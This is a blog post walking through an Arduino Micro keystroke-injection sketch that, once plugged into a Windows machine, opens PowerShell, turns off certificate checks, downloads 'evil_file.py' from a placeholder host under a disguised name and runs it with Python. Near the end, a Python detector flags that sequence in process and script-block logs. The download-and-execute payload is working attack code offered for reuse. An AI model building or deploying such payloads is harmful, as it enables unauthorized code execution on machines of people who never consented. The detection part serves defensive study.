Saturday, October 10, 2015

DarkDuino Payload 1: Powershell DnE




The first payload I came up with for the DarkDuino was a simple PowerShell payload to download a given file off the network and then execute it. I will go over the code in detail below. This is the main loop in a sketch uploaded to an Arduino Micro microcontroller. At a high level, when the DarkDuino is connected to a target system and pinButton is pressed (brought to GND), it fires off a PowerShell command to download a Python file and execute it. It does assume the network allows local area network traffic on port 80, or 443 if you're using HTTPS (and you should be!). It also assumes that the system has the python executable in its PATH. Here is the commented code:



… cut...
void loop() {
  if (!digitalRead(pinButton)) {
    digitalWrite(pinLed, HIGH);

    //Use the run box quick-keys to open cmd.exe
    Keyboard.press(KEY_LEFT_GUI);
    Keyboard.print(F("r"));
    Keyboard.releaseAll();
    delay(1000);

    //Open PowerShell to download the file
    Keyboard.print(F("powershell -noprofile "));
    Keyboard.press(KEY_RETURN);
    Keyboard.releaseAll();
    Keyboard.press(KEY_TAB);
    Keyboard.releaseAll();  //semicolon was missing here, which would not compile
    Keyboard.press(KEY_RETURN);
    Keyboard.releaseAll();

    //Enter Download command into PowerShell
    Keyboard.print(F("[System.Net.ServicePointManager]::"));
    Keyboard.print(F("ServerCertificateValidationCallback = {$true}; "));

    //Change the IPADDRESS variable to the FQDN or LAN IP of the system holding
    //the payload.
    Keyboard.print(F("$source=\"\"\"http://IPADDRESS/evil_file.py\"\"\"; "));

    //You can also change the download location here
    Keyboard.print(F("$destination=\"\"\"C:\\temp\\update_r34u7.py\"\"\"; "));

    //See Red Team Field Manual for the original example of this PS payload
    Keyboard.print(F("$http = new-object System.Net.WebClient; "));
    Keyboard.print(F("$response = $http.DownloadFile($source, $destination);\" "));
    Keyboard.press(KEY_RETURN);
    Keyboard.releaseAll();

    //Give the program a few seconds to DL the file, then exit PS
    delay(3000);
    Keyboard.print(F("exit"));
    Keyboard.press(KEY_RETURN);
    Keyboard.releaseAll();

    //Now execute it with Python
    Keyboard.print(F("python C:\\temp\\update_r34u7.py"));
    Keyboard.press(KEY_RETURN);
    Keyboard.releaseAll();

    //Simple debounce
    delay(500);
    digitalWrite(pinLed, LOW);
  }
}  //closing brace for loop() was missing in the original listing
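
From the defender's side, the sequence above leaves a recognisable trail: a cmd.exe started from the run box, a PowerShell session with the profile suppressed, certificate validation switched off, a WebClient download to C:\temp, and an interpreter launched on that file a few seconds later. The following Python is an added example, not code from the post, that scores constructed process-creation and script-block records for exactly those indicators; the record field names (ts, kind, parent, image, text) are assumptions, not a real log schema.

```python
import re

# Indicators lifted from the typed payload; each regex is paired with a short reason.
INDICATORS = [
    (re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I),
     "TLS certificate validation disabled"),
    (re.compile(r"new-object\s+System\.Net\.WebClient", re.I), "WebClient instantiated"),
    (re.compile(r"\.DownloadFile\(", re.I), "file download to disk"),
    (re.compile(r"(?:^|\s)-no(?:p|profile)\b", re.I), "profile suppressed"),
    (re.compile(r"^python(?:\.exe)?\s+[A-Za-z]:\\temp\\", re.I),
     "interpreter launched on a script in C:\\temp"),
]

def score_text(text):
    """Return the reasons matched in one command line or script block."""
    return [reason for pattern, reason in INDICATORS if pattern.search(text)]

def flag_chains(events, window=10.0):
    """events: time-ordered dicts with ts (seconds), kind ('proc' or 'script'),
    parent, image and text (command line or script block).  A cmd.exe spawned by
    explorer.exe (the Win+R run box) is flagged when a download indicator and an
    interpreter run from C:\\temp both follow it within `window` seconds."""
    hits = []
    for i, e in enumerate(events):
        if not (e["kind"] == "proc" and e["image"] == "cmd.exe"
                and e["parent"] == "explorer.exe"):
            continue
        later = [x for x in events[i + 1:] if 0 <= x["ts"] - e["ts"] <= window]
        reasons = sorted({r for x in later for r in score_text(x["text"])})
        if "file download to disk" in reasons and any(r.startswith("interpreter") for r in reasons):
            hits.append((e["ts"], reasons))
    return hits

# Constructed sample records (assumed field names, not a real log schema); the first
# four mirror the sequence the sketch types, the last two are a benign look-alike.
SAMPLE_EVENTS = [
    {"ts": 0.0, "kind": "proc", "parent": "explorer.exe", "image": "cmd.exe", "text": "cmd.exe"},
    {"ts": 1.1, "kind": "proc", "parent": "cmd.exe", "image": "powershell.exe",
     "text": "powershell -noprofile"},
    {"ts": 2.0, "kind": "script", "parent": "", "image": "powershell.exe",
     "text": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; "
             "$source=\"http://IPADDRESS/evil_file.py\"; $destination=\"C:\\temp\\update_r34u7.py\"; "
             "$http = new-object System.Net.WebClient; $response = $http.DownloadFile($source, $destination);"},
    {"ts": 5.4, "kind": "proc", "parent": "cmd.exe", "image": "python.exe",
     "text": "python C:\\temp\\update_r34u7.py"},
    {"ts": 60.0, "kind": "proc", "parent": "explorer.exe", "image": "cmd.exe", "text": "cmd.exe"},
    {"ts": 61.0, "kind": "proc", "parent": "cmd.exe", "image": "python.exe",
     "text": "python C:\\Users\\dev\\build.py"},
]
```

The script-block record only exists if PowerShell script block logging is turned on; without it, the process-creation records (the -noprofile launch and the python run out of C:\temp) are what remains to correlate.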

After I roughed out this sketch, I went back through and refactored some of the code into methods, which shrank the overall size a good bit and makes new payloads easier to build by modifying a copy of this one. I will write up that code as soon as I am finished testing it. Make sure to check back in the near future.
